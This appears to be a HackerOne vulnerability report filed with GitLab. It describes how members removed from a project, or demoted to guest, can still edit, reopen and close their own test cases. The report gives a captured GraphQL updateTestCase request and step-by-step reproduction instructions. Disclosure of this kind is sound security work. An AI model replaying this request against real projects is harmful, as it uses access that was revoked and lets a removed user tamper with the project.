Removed members from project can Reopen , Update and Close their own Test cases on gitlab.com [Access control issue ]
HackerOne report #2257460 by indoappsec
on 2023-11-20, assigned to @ngeorge1:
Report | Attachments | How To Reproduce
Report
Summary :
On gitlab.com projects -- > Build -- > Test cases , users with reporter permission can Create , edit , remove test cases in project.
https://docs.gitlab.com/ee/user/permissions.html
When the user is member of the project he will have complete access to Test cases. But when he will be removed , he shouldn't have any access to project Test cases.
In My testing i found that Removed members of projects can still Re-open , Update and close their own test cases in project.
This way user will always be able to interact with project through test cases.
Ex : Any time this user can Re-open the case and update the content to look like new test case .
Note : The same issue applies on private projects too when they are demoted to guest role user in the project.
Vulnerable HTTP Request :
POST /api/graphql HTTP/2
Host: gitlab.com
Cookie: Cookies
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/VG-Admin-group-Latest/test-project-1110/-/quality/test_cases/10
Content-Type: application/json
Content-Length: 1271
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"operationName":"updateTestCase","variables":{"input":{"projectPath":"VG-Admin-group-Latest/test-project-1110","iid":"10","title":"Able to update Test Case ","description":"Able to update Test Case"}},"query":"mutation updateTestCase($input: UpdateIssueInput!) {\n updateIssue(input: $input) {\n clientMutationId\n errors\n issue {\n ...TestCase\n taskCompletionStatus {\n count\n completedCount\n __typename\n }\n __typename\n }\n __typename\n }\n}\n\nfragment TestCase on Issue {\n id\n title\n titleHtml\n description\n descriptionHtml\n state\n type\n createdAt\n updatedAt\n updatedBy {\n ...Author\n __typename\n }\n webUrl\n blocked\n confidential\n moved\n movedTo {\n id\n webUrl\n __typename\n }\n author {\n ...Author\n __typename\n }\n labels {\n nodes {\n ...Label\n __typename\n }\n __typename\n }\n currentUserTodos(first: 1) {\n nodes {\n id\n state\n __typename\n }\n __typename\n }\n __typename\n}\n\nfragment Author on User {\n id\n avatarUrl\n name\n username\n webUrl\n __typename\n}\n\nfragment Label on Label {\n id\n title\n description\n color\n textColor\n __typename\n}\n"}
Steps to reproduce :
You will need 2 accounts to reproduce this issue. One will be group Owner account and one will be member account.
1.Login from group owner account and add new public project.(Ex: test project )
2.Now go to projects -- > members and add new test member as reporter role user.
3.Now login from test member user and go to test project.
4.Go to build -- > test cases section and create new test case. (Ex: attacker test case )
5.Now Capture the HTTP Requests of Edit test case , Archive test case and Reopen test case actions.
6.The Request would look like above mentioned GraphQL request.Only the parameters will be different for each request.
7.Now from Owner account remove the test user from project.
8.Now from test user account check the test cases section and you will notice test user now don't have access to edit access to test cases.
9.Now Run the captured Request from test user account .
10.You will notice that test user is still able to update , reopen and archive Test cases in the project.
Note : In order to reproduce the issue for Private projects , follow the same step but don't remove the user from project , only Demote the user to guest user and attack will still work.
What is the current bug behavior?
Removed users shouldn't be able to
What is the expected correct behavior?
Output of checks :
This bug happens on GitLab.com
Impact
Removed members from project can Reopen , Update and Close their own Test cases on gitlab.com [Access control issue ]
This way user will always be able to interact with project through test cases.
Ex : Any time this user can Re-open the case and update the content to look like new test case .
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: